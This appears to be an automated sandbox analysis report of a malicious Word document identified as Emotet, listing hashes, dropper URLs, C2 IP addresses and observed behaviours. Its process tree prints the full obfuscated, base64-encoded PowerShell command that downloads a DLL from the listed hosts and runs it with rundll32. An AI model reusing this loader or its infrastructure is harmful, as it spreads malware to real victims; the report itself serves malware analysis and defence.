Analysis
-
max time kernel
139s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-01-2021 11:58
Static task
static1
Behavioral task
behavioral1
Sample
dati-122020.doc
Resource
win7v20201028
General
-
Target
dati-122020.doc
-
Size
163KB
-
MD5
a00b6d3f7b8f019a42b3d7c5c5652134
-
SHA1
4810219ad0ff3a0314f27c3e31c39a0f6d5558a6
-
SHA256
f7aeb3239c5f65d2fbd4e934bbd637cd8751ccd6f8c31be5242df356cfef44dd
-
SHA512
bf5ae34e07c371637bba0b7418ced987cf3c318649dd2afdc7a1bbd50d137bfaf8739d99f42f47e05a5634ee56734b18691f6811f7fe264a7560ec3db973907e
Malware Config
Extracted
http://206.189.146.42/wp-admin/F0xAutoConfig/XR9/
http://paroissesaintabraham.com/wp-admin/H/
https://lnfch.com/wp-includes/quC/
https://nahlasolimandesigns.com/wp-admin/0HHK7/
http://harmonimedia.com/wp-content/uploads/Zol/
http://ncap.lbatechnologies.com/media/6iQ/
https://lainiotisllc.com/postauth/7XhB/
Extracted
emotet
Epoch2
74.58.215.226:80
24.164.79.147:8080
157.245.123.197:8080
50.116.111.59:8080
173.249.20.233:443
78.188.225.105:80
75.177.207.146:80
136.244.110.184:8080
194.190.67.75:80
70.92.118.112:80
110.145.101.66:443
194.4.58.192:7080
217.20.166.178:7080
109.74.5.95:8080
110.145.11.73:80
66.57.108.14:443
78.189.148.42:80
144.217.7.207:7080
120.150.60.189:80
37.139.21.175:8080
185.94.252.104:443
74.40.205.197:443
152.170.205.73:80
190.29.166.0:80
176.111.60.55:8080
47.144.21.37:80
139.99.158.11:443
172.86.188.251:8080
123.176.25.234:80
120.150.218.241:443
121.124.124.40:7080
64.207.182.168:8080
97.120.3.198:80
24.231.88.85:80
95.213.236.64:8080
5.2.212.254:80
188.165.214.98:8080
174.118.202.24:443
190.240.194.77:443
172.104.97.173:8080
61.19.246.238:443
181.165.68.127:80
24.178.90.49:80
50.245.107.73:443
37.187.72.193:8080
209.141.54.221:7080
168.235.67.138:7080
62.30.7.67:443
5.39.91.110:7080
200.116.145.225:443
62.171.142.179:8080
185.201.9.197:8080
187.161.206.24:80
190.162.215.233:80
118.83.154.64:443
134.209.144.106:443
157.245.99.39:8080
139.59.60.244:8080
50.91.114.38:80
197.211.245.21:80
93.146.48.84:80
173.70.61.180:80
67.170.250.203:443
191.112.178.60:80
24.69.65.8:8080
89.216.122.92:80
201.241.127.190:80
142.112.10.95:20
181.171.209.241:443
87.106.139.101:8080
85.105.111.166:80
78.24.219.147:8080
95.9.5.93:80
115.94.207.99:443
110.145.77.103:80
74.208.45.104:8080
119.59.116.21:8080
172.105.13.66:443
59.21.235.119:80
62.75.141.82:80
100.37.240.62:80
139.162.60.124:8080
188.219.31.12:80
109.116.245.80:80
220.245.198.194:80
2.58.16.89:8080
178.152.87.96:80
167.114.153.111:8080
49.205.182.134:80
70.180.33.202:80
161.0.153.60:80
202.134.4.211:8080
70.183.211.3:80
51.89.36.180:443
72.186.136.247:443
79.137.83.50:443
202.141.243.254:443
46.105.131.79:8080
203.153.216.189:7080
74.128.121.17:80
202.134.4.216:8080
98.109.133.80:80
104.131.11.150:443
24.179.13.119:80
41.185.28.84:8080
138.68.87.218:443
172.125.40.123:80
94.23.237.171:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3188 3368 cmd.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exerundll32.exeflow pid process 20 2996 powershell.exe 30 2996 powershell.exe 32 2996 powershell.exe 34 2996 powershell.exe 35 812 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3680 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Mzjwimtbmdqbtb\uuqjowivkglbp.sxz rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 576 WINWORD.EXE 576 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exerundll32.exepid process 2996 powershell.exe 2996 powershell.exe 2996 powershell.exe 812 rundll32.exe 812 rundll32.exe 812 rundll32.exe 812 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2996 powershell.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
WINWORD.EXEpid process 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exepowershell.exerundll32.exerundll32.exedescription pid process target process PID 3188 wrote to memory of 3584 3188 cmd.exe msg.exe PID 3188 wrote to memory of 3584 3188 cmd.exe msg.exe PID 3188 wrote to memory of 2996 3188 cmd.exe powershell.exe PID 3188 wrote to memory of 2996 3188 cmd.exe powershell.exe PID 2996 wrote to memory of 4060 2996 powershell.exe rundll32.exe PID 2996 wrote to memory of 4060 2996 powershell.exe rundll32.exe PID 4060 wrote to memory of 3680 4060 rundll32.exe rundll32.exe PID 4060 wrote to memory of 3680 4060 rundll32.exe rundll32.exe PID 4060 wrote to memory of 3680 4060 rundll32.exe rundll32.exe PID 3680 wrote to memory of 812 3680 rundll32.exe rundll32.exe PID 3680 wrote to memory of 812 3680 rundll32.exe rundll32.exe PID 3680 wrote to memory of 812 3680 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dati-122020.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBlAHQALQBpAFQAZQBtACAAVgBBAHIASQBBAGIATABFADoANgBKAHIAIAAoACAAIABbAFQAeQBwAEUAXQAoACIAewA0AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AIgAtAGYAJwAuAEQASQByAEUAQwAnACwAJwBTAFQAZQBNAC4AJwAsACcAVABvAHIAWQAnACwAJwBJAG8AJwAsACcAUwBZACcAKQAgACAAKQAgADsAIABzAHYAIAAoACIAVQAiACsAIgBoAEIAIgApACAAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsANwB9AHsAMgB9AHsAMQB9AHsAOAB9AHsANAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBOAGEARwBlAHIAJwAsACcATQAuACcALAAnAGUAJwAsACcASQBjAEUAUABvAGkATgAnACwAJwBzAEUAUgBWACcALAAnAE0AQQAnACwAJwB0ACcALAAnAHMAeQBzAHQAJwAsACcAbgBlAHQALgAnACkAIAAgACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACgAJwBpACcAKwAnAGwAZQBuAHQAJwApACsAJwBsACcAKwAnAHkAJwArACgAJwBDAG8AbgAnACsAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAE8AYwBoAGcAYQBwADIAPQAkAFAAMwA5AFEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AXwAwAEEAOwAkAFYANwAxAEYAPQAoACcAWAAyACcAKwAnADAAUgAnACkAOwAgACgAVgBBAFIASQBhAEIATABlACAAIAA2AEoAUgApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAQQB0AGAARQBEAEkAYABSAGUAYwBUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBmAFEAdQAnACsAJwBYAGYAJwApACsAKAAnADUAcAAnACsAJwA3ADcAJwApACsAJwBxACcAKwAoACcAZgBRACcAKwAnAHUAVQAxACcAKQArACcAZwB2ACcAKwAoACcAYgAxAHEAZgAnACsAJwBRACcAKQArACcAdQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAnAGYAUQAnACsAJwB1ACcAKQAsAFsAcwBUAFIASQBOAGcAXQBbAEMAaABBAHIAXQA5ADIAKQApACkAOwAkAEQAMgA1AEIAPQAoACcASgAnACsAKAAnADQAJwArACcAMABMACcAKQApADsAIAAgACgAIABEAEkAcgAgACgAIgBWAEEAcgBJAEEAYgBsACIAKwAiAGUAOgB1AEgAIgArACIAYgAiACkAIAApAC4AVgBBAGwAdQBFADoAOgAiAFMAYABFAGMAVQBSAEkAYABUAFkAYABQAGAAUgBvAFQAbwBjAE8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQQA5ADgASgA9ACgAKAAnAFYAOAAnACsAJwAyACcAKQArACcAUwAnACkAOwAkAFkAbwBoAGUAdgB3AGoAIAA9ACAAKAAnAEYAJwArACgAJwBfADUAJwArACcAUAAnACkAKQA7ACQAVwA5ADcATAA9ACgAKAAnAEwAJwArACcAMwAxACcAKQArACcASgAnACkAOwAkAEkAOAA1AHYAaABfAHYAPQAkAEgATwBNAEUAKwAoACgAJwBOAFIAJwArACgAJwBhAFgAZgA1ACcAKwAnAHAANwA3ACcAKwAnAHEATgAnACkAKwAoACcAUgBhACcAKwAnAFUAMQBnACcAKQArACcAdgAnACsAJwBiACcAKwAoACcAMQBxAE4AJwArACcAUgAnACkAKwAnAGEAJwApACAAIAAtAHIARQBQAEwAYQBDAGUAIAAgACgAJwBOACcAKwAnAFIAYQAnACkALABbAEMASABhAHIAXQA5ADIAKQArACQAWQBvAGgAZQB2AHcAagArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEwAOQA4AFIAPQAoACcARwAnACsAKAAnADEAJwArACcANQBJACcAKQApADsAJABWAGcAcgAxAGIAcQB5AD0AKAAoACcAXQBiADIAJwArACcAWwAnACsAJwBzADoALwAnACkAKwAnAC8AMgAnACsAKAAnADAANgAuACcAKwAnADEAJwApACsAJwA4ACcAKwAnADkAJwArACcALgAxACcAKwAnADQAJwArACgAJwA2AC4AJwArACcANAAyACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwBGADAAeAAnACsAJwBBAHUAdAAnACsAJwBvACcAKQArACgAJwBDAG8AbgBmAGkAJwArACcAZwAvAFgAJwArACcAUgAnACkAKwAnADkAJwArACgAJwAvACcAKwAnAEAAXQBiACcAKQArACcAMgAnACsAJwBbACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAcAAnACsAJwBhAHIAbwBpAHMAcwBlAHMAJwArACcAYQBpACcAKwAnAG4AdABhAGIAJwArACcAcgAnACkAKwAnAGEAJwArACgAJwBoAGEAJwArACcAbQAuAGMAbwAnACsAJwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAJwArACcAbQBpAG4ALwBIACcAKwAnAC8AQABdACcAKQArACgAJwBiADIAJwArACcAWwBzAHMAOgAvAC8AJwApACsAKAAnAGwAbgAnACsAJwBmAGMAJwApACsAKAAnAGgALgAnACsAJwBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAAnACsAJwB1AGQAZQAnACkAKwAnAHMAJwArACgAJwAvACcAKwAnAHEAdQBDACcAKwAnAC8AQAAnACkAKwAoACcAXQBiACcAKwAnADIAWwAnACkAKwAnAHMAcwAnACsAKAAnADoALwAnACsAJwAvAG4AJwArACcAYQBoAGwAJwApACsAKAAnAGEAcwAnACsAJwBvACcAKQArACcAbAAnACsAKAAnAGkAbQBhAG4AZABlACcAKwAnAHMAaQAnACkAKwAoACcAZwBuACcAKwAnAHMALgAnACsAJwBjAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAALQAnACsAJwBhACcAKQArACcAZABtACcAKwAnAGkAJwArACcAbgAnACsAKAAnAC8AMABIAEgAJwArACcASwA3AC8AQABdACcAKwAnAGIAMgAnACkAKwAnAFsAJwArACcAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACcAaAAnACsAJwBhAHIAJwArACcAbQAnACsAJwBvACcAKwAnAG4AJwArACgAJwBpACcAKwAnAG0AZQAnACkAKwAoACcAZAAnACsAJwBpAGEALgAnACkAKwAoACcAYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBjAG8AJwApACsAJwBuACcAKwAoACcAdAAnACsAJwBlAG4AJwApACsAKAAnAHQALwAnACsAJwB1ACcAKQArACcAcABsACcAKwAoACcAbwAnACsAJwBhAGQAcwAvAFoAbwBsAC8AJwArACcAQAAnACkAKwAnAF0AYgAnACsAJwAyACcAKwAoACcAWwAnACsAJwBzADoAJwApACsAJwAvACcAKwAoACcALwBuAGMAJwArACcAYQAnACkAKwAnAHAAJwArACgAJwAuAGwAYgAnACsAJwBhAHQAZQBjACcAKwAnAGgAJwArACcAbgBvAGwAJwApACsAKAAnAG8AZwBpACcAKwAnAGUAcwAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvAG0AZQBkACcAKwAnAGkAJwArACcAYQAnACsAJwAvACcAKQArACgAJwA2ACcAKwAnAGkAUQAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyAFsAcwBzADoAJwApACsAJwAvAC8AJwArACgAJwBsACcAKwAnAGEAaQBuAGkAbwAnACkAKwAnAHQAJwArACcAaQAnACsAJwBzACcAKwAnAGwAJwArACcAbABjACcAKwAoACcALgBjAG8AbQAvAHAAbwBzAHQAJwArACcAYQB1ACcAKwAnAHQAJwArACcAaAAvADcAJwArACcAWAAnACsAJwBoAEIALwAnACkAKQAuACIAcgBFAGAAcABgAEwAYQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQAWgBfADgAUQAgACsAIAAkAE8AYwBoAGcAYQBwADIAIAArACAAJABHADEAMgBJACkAOwAkAEUAOQA5AEEAPQAoACgAJwBPACcAKwAnADgANQAnACkAKwAnAEYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABNAGsAbgBuAHkAaQBvACAAaQBuACAAJABWAGcAcgAxAGIAcQB5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABzAHkAUwBUAEUATQAuAE4AZQB0AC4AdwBlAGIAQwBMAEkARQBuAHQAKQAuACIARABvAGAAdwBOAGwATwBBAGQARgBJAGAATABFACIAKAAkAE0AawBuAG4AeQBpAG8ALAAgACQASQA4ADUAdgBoAF8AdgApADsAJABWADkANABSAD0AKAAnAEEAXwAnACsAJwA1AFcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAOAA1AHYAaABfAHYAKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIAMAA0ADcAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASQA4ADUAdgBoAF8AdgAsACgAKAAnAEMAbwBuACcAKwAnAHQAcgBvAGwAXwAnACkAKwAnAFIAJwArACcAdQAnACsAKAAnAG4ARAAnACsAJwBMAEwAJwApACkALgAiAHQATwBTAFQAYABSAEkAYABOAGcAIgAoACkAOwAkAE8AMQA1AEIAPQAoACgAJwBEACcAKwAnAF8AXwAnACkAKwAnAFoAJwApADsAYgByAGUAYQBrADsAJABCADgANgBOAD0AKAAoACcAQQA4ACcAKwAnADcAJwApACsAJwBJACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgAzADIASwA9ACgAJwBSADEAJwArACcANgBMACcAKQA=1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD UwBlAHQALQBpAFQAZQBtACAAVgBBAHIASQBBAGIATABFADoANgBKAHIAIAAoACAAIABbAFQAeQBwAEUAXQAoACIAewA0AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AIgAtAGYAJwAuAEQASQByAEUAQwAnACwAJwBTAFQAZQBNAC4AJwAsACcAVABvAHIAWQAnACwAJwBJAG8AJwAsACcAUwBZACcAKQAgACAAKQAgADsAIABzAHYAIAAoACIAVQAiACsAIgBoAEIAIgApACAAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsANwB9AHsAMgB9AHsAMQB9AHsAOAB9AHsANAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBOAGEARwBlAHIAJwAsACcATQAuACcALAAnAGUAJwAsACcASQBjAEUAUABvAGkATgAnACwAJwBzAEUAUgBWACcALAAnAE0AQQAnACwAJwB0ACcALAAnAHMAeQBzAHQAJwAsACcAbgBlAHQALgAnACkAIAAgACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACgAJwBpACcAKwAnAGwAZQBuAHQAJwApACsAJwBsACcAKwAnAHkAJwArACgAJwBDAG8AbgAnACsAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAE8AYwBoAGcAYQBwADIAPQAkAFAAMwA5AFEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AXwAwAEEAOwAkAFYANwAxAEYAPQAoACcAWAAyACcAKwAnADAAUgAnACkAOwAgACgAVgBBAFIASQBhAEIATABlACAAIAA2AEoAUgApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAQQB0AGAARQBEAEkAYABSAGUAYwBUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBmAFEAdQAnACsAJwBYAGYAJwApACsAKAAnADUAcAAnACsAJwA3ADcAJwApACsAJwBxACcAKwAoACcAZgBRACcAKwAnAHUAVQAxACcAKQArACcAZwB2ACcAKwAoACcAYgAxAHEAZgAnACsAJwBRACcAKQArACcAdQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAnAGYAUQAnACsAJwB1ACcAKQAsAFsAcwBUAFIASQBOAGcAXQBbAEMAaABBAHIAXQA5ADIAKQApACkAOwAkAEQAMgA1AEIAPQAoACcASgAnACsAKAAnADQAJwArACcAMABMACcAKQApADsAIAAgACgAIABEAEkAcgAgACgAIgBWAEEAcgBJAEEAYgBsACIAKwAiAGUAOgB1AEgAIgArACIAYgAiACkAIAApAC4AVgBBAGwAdQBFADoAOgAiAFMAYABFAGMAVQBSAEkAYABUAFkAYABQAGAAUgBvAFQAbwBjAE8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQQA5ADgASgA9ACgAKAAnAFYAOAAnACsAJwAyACcAKQArACcAUwAnACkAOwAkAFkAbwBoAGUAdgB3AGoAIAA9ACAAKAAnAEYAJwArACgAJwBfADUAJwArACcAUAAnACkAKQA7ACQAVwA5ADcATAA9ACgAKAAnAEwAJwArACcAMwAxACcAKQArACcASgAnACkAOwAkAEkAOAA1AHYAaABfAHYAPQAkAEgATwBNAEUAKwAoACgAJwBOAFIAJwArACgAJwBhAFgAZgA1ACcAKwAnAHAANwA3ACcAKwAnAHEATgAnACkAKwAoACcAUgBhACcAKwAnAFUAMQBnACcAKQArACcAdgAnACsAJwBiACcAKwAoACcAMQBxAE4AJwArACcAUgAnACkAKwAnAGEAJwApACAAIAAtAHIARQBQAEwAYQBDAGUAIAAgACgAJwBOACcAKwAnAFIAYQAnACkALABbAEMASABhAHIAXQA5ADIAKQArACQAWQBvAGgAZQB2AHcAagArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEwAOQA4AFIAPQAoACcARwAnACsAKAAnADEAJwArACcANQBJACcAKQApADsAJABWAGcAcgAxAGIAcQB5AD0AKAAoACcAXQBiADIAJwArACcAWwAnACsAJwBzADoALwAnACkAKwAnAC8AMgAnACsAKAAnADAANgAuACcAKwAnADEAJwApACsAJwA4ACcAKwAnADkAJwArACcALgAxACcAKwAnADQAJwArACgAJwA2AC4AJwArACcANAAyACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuAC8AJwArACgAJwBGADAAeAAnACsAJwBBAHUAdAAnACsAJwBvACcAKQArACgAJwBDAG8AbgBmAGkAJwArACcAZwAvAFgAJwArACcAUgAnACkAKwAnADkAJwArACgAJwAvACcAKwAnAEAAXQBiACcAKQArACcAMgAnACsAJwBbACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAcAAnACsAJwBhAHIAbwBpAHMAcwBlAHMAJwArACcAYQBpACcAKwAnAG4AdABhAGIAJwArACcAcgAnACkAKwAnAGEAJwArACgAJwBoAGEAJwArACcAbQAuAGMAbwAnACsAJwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAJwArACcAbQBpAG4ALwBIACcAKwAnAC8AQABdACcAKQArACgAJwBiADIAJwArACcAWwBzAHMAOgAvAC8AJwApACsAKAAnAGwAbgAnACsAJwBmAGMAJwApACsAKAAnAGgALgAnACsAJwBjACcAKQArACgAJwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAAnACsAJwB1AGQAZQAnACkAKwAnAHMAJwArACgAJwAvACcAKwAnAHEAdQBDACcAKwAnAC8AQAAnACkAKwAoACcAXQBiACcAKwAnADIAWwAnACkAKwAnAHMAcwAnACsAKAAnADoALwAnACsAJwAvAG4AJwArACcAYQBoAGwAJwApACsAKAAnAGEAcwAnACsAJwBvACcAKQArACcAbAAnACsAKAAnAGkAbQBhAG4AZABlACcAKwAnAHMAaQAnACkAKwAoACcAZwBuACcAKwAnAHMALgAnACsAJwBjAG8AbQAvACcAKwAnAHcAJwApACsAKAAnAHAALQAnACsAJwBhACcAKQArACcAZABtACcAKwAnAGkAJwArACcAbgAnACsAKAAnAC8AMABIAEgAJwArACcASwA3AC8AQABdACcAKwAnAGIAMgAnACkAKwAnAFsAJwArACcAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACcAaAAnACsAJwBhAHIAJwArACcAbQAnACsAJwBvACcAKwAnAG4AJwArACgAJwBpACcAKwAnAG0AZQAnACkAKwAoACcAZAAnACsAJwBpAGEALgAnACkAKwAoACcAYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBjAG8AJwApACsAJwBuACcAKwAoACcAdAAnACsAJwBlAG4AJwApACsAKAAnAHQALwAnACsAJwB1ACcAKQArACcAcABsACcAKwAoACcAbwAnACsAJwBhAGQAcwAvAFoAbwBsAC8AJwArACcAQAAnACkAKwAnAF0AYgAnACsAJwAyACcAKwAoACcAWwAnACsAJwBzADoAJwApACsAJwAvACcAKwAoACcALwBuAGMAJwArACcAYQAnACkAKwAnAHAAJwArACgAJwAuAGwAYgAnACsAJwBhAHQAZQBjACcAKwAnAGgAJwArACcAbgBvAGwAJwApACsAKAAnAG8AZwBpACcAKwAnAGUAcwAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvAG0AZQBkACcAKwAnAGkAJwArACcAYQAnACsAJwAvACcAKQArACgAJwA2ACcAKwAnAGkAUQAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyAFsAcwBzADoAJwApACsAJwAvAC8AJwArACgAJwBsACcAKwAnAGEAaQBuAGkAbwAnACkAKwAnAHQAJwArACcAaQAnACsAJwBzACcAKwAnAGwAJwArACcAbABjACcAKwAoACcALgBjAG8AbQAvAHAAbwBzAHQAJwArACcAYQB1ACcAKwAnAHQAJwArACcAaAAvADcAJwArACcAWAAnACsAJwBoAEIALwAnACkAKQAuACIAcgBFAGAAcABgAEwAYQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBwAGwAYABJAHQAIgAoACQAWgBfADgAUQAgACsAIAAkAE8AYwBoAGcAYQBwADIAIAArACAAJABHADEAMgBJACkAOwAkAEUAOQA5AEEAPQAoACgAJwBPACcAKwAnADgANQAnACkAKwAnAEYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABNAGsAbgBuAHkAaQBvACAAaQBuACAAJABWAGcAcgAxAGIAcQB5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABzAHkAUwBUAEUATQAuAE4AZQB0AC4AdwBlAGIAQwBMAEkARQBuAHQAKQAuACIARABvAGAAdwBOAGwATwBBAGQARgBJAGAATABFACIAKAAkAE0AawBuAG4AeQBpAG8ALAAgACQASQA4ADUAdgBoAF8AdgApADsAJABWADkANABSAD0AKAAnAEEAXwAnACsAJwA1AFcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAOAA1AHYAaABfAHYAKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIAMAA0ADcAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASQA4ADUAdgBoAF8AdgAsACgAKAAnAEMAbwBuACcAKwAnAHQAcgBvAGwAXwAnACkAKwAnAFIAJwArACcAdQAnACsAKAAnAG4ARAAnACsAJwBMAEwAJwApACkALgAiAHQATwBTAFQAYABSAEkAYABOAGcAIgAoACkAOwAkAE8AMQA1AEIAPQAoACgAJwBEACcAKwAnAF8AXwAnACkAKwAnAFoAJwApADsAYgByAGUAYQBrADsAJABCADgANgBOAD0AKAAoACcAQQA4ACcAKwAnADcAJwApACsAJwBJACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgAzADIASwA9ACgAJwBSADEAJwArACcANgBMACcAKQA=2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dll,Control_RunDLL3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dll,Control_RunDLL4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mzjwimtbmdqbtb\uuqjowivkglbp.sxz",Control_RunDLL5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dllMD5
1b17ddb20a1593554449757b725d44a0
SHA12c0636a9eaec8f3046d353d7cce5fcbe1d98f239
SHA25627c3e4bc2194534a3cdaec0659490b039ea31414acb324c937ac96e32de2ddba
SHA5125d11ac5505b128f7b33d12b7ba223f89f511df019285877ac5b37823042bb61dc190134a82e39b4aff275068bff5eb9b0ef87f6d6a7e94f90147982098e4b7de
-
\Users\Admin\Xf5p77q\U1gvb1q\F_5P.dllMD5
1b17ddb20a1593554449757b725d44a0
SHA12c0636a9eaec8f3046d353d7cce5fcbe1d98f239
SHA25627c3e4bc2194534a3cdaec0659490b039ea31414acb324c937ac96e32de2ddba
SHA5125d11ac5505b128f7b33d12b7ba223f89f511df019285877ac5b37823042bb61dc190134a82e39b4aff275068bff5eb9b0ef87f6d6a7e94f90147982098e4b7de
-
